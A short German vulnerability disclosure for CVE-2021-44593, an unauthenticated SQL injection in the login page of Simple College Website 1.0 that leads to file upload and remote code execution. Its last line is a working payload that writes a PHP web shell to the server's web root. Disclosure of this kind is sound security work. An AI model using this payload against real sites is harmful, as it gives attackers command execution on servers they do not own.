
Öffentliche Offenlegung und Writeup zu CVE-2021-44593, einer nicht authentifizierten SQL-Injection in Simple College Website, die zu beliebigem Datei-Upload und Remote-Code-Ausführung führt.
Öffentliche Offenlegung von CVE-2021-44593. Eine SQL-Injection/Arbitrary File Upload/Remote Code Execution-Schwachstelle in Simple College Website.
Simple College Website 1.0 ist anfällig für eine nicht authentifizierte UNION-basierte SQL-Injection im Parameter „username“ der Seite /admin/login.php, die anschließend genutzt werden kann, um beliebige Dateien hochzuladen und Remote Code Execution zu erlangen.
Die Funktion login() in admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -